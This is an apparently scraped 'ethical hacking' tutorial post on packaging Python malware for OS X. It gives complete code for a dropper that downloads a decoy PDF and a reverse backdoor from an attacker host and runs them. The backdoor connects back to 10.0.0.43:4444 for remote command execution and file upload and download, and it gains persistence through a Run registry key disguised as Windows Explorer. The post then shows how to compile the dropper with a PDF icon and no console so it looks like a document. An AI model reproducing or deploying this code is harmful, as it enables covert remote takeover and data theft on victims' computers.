Python Ethical Hacking - Malware Packaging(3)

Convert Python Programs to OS X Executables

https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl

 

Install the pyinstaller on OS X.

pip3 install pyinstaller

Modify the Python Code - download_and_execute.py

#!/usr/bin/env python
import os
import subprocess
import requests
import tempfile


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)


temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)

download("http://10.0.0.43/evil-files/sample.pdf")
subprocess.Popen("open sample.pdf", shell=True)

download("http://10.0.0.43/evil-files/reverse_backdoor.py")
subprocess.call("python reverse_backdoor.py", shell=True)

os.remove("sample.pdf")
os.remove("reverse_backdoor.py")

Modify the Python code -  reverse_backdoor.py.

#!/usr/bin/env python
import json
import socket
import subprocess
import os
import base64
import sys
import shutil
import tempfile


def resource_path(relative_path):
    try:
        base_path = sys._MEIPASS
    except Exception:
        base_path = tempfile.gettempdir()
    return os.path.join(base_path, relative_path)


class Backdoor:
    def __init__(self, ip, port):
        self.become_persistent()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def become_persistent(self):
        evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
        if not os.path.exists(evil_file_location):
            shutil.copyfile(sys.executable, evil_file_location)
            subprocess.call(
                'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"',
                shell=True)

    def reliable_send(self, data):
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def change_working_directory_to(self, path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):
        DEVNULL = open(os.devnull, "wb")
        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):
        with open(path, "rb") as file:
            return base64.b64encode(file.read())

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Upload successful."

    def run(self):
        while True:
            command = self.reliable_receive()

            try:
                if command[0] == "exit":
                    self.connection.close()
                    sys.exit()
                elif command[0] == "cd" and len(command) > 1:
                    command_result = self.change_working_directory_to(command[1])
                elif command[0] == "upload":
                    command_result = self.write_file(command[1], command[2])
                elif command[0] == "download":
                    command_result = self.read_file(command[1]).decode()
                else:
                    command_result = self.execute_system_command(command).decode()
            except Exception:
                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)


#file_name = resource_path(os.path.dirname(os.path.abspath(__file__))) + "/sample.pdf"
file_name = tempfile.gettempdir() + "/sample.pdf"
print(file_name)
#subprocess.Popen(file_name, shell=True)

try:
    my_backdoor = Backdoor("10.0.0.43", 4444)
    my_backdoor.run()
except Exception:
    sys.exit()

 

 

Prepare an icon file(pdf.icns).

Python Ethical Hacking - Malware Packaging(3)_第1张图片

 

 Convert the Python to OS X executable.

pyinstaller --onefile --noconsole --icon pdf.icns download_and_execute.py

 

你可能感兴趣的:(Python Ethical Hacking - Malware Packaging(3))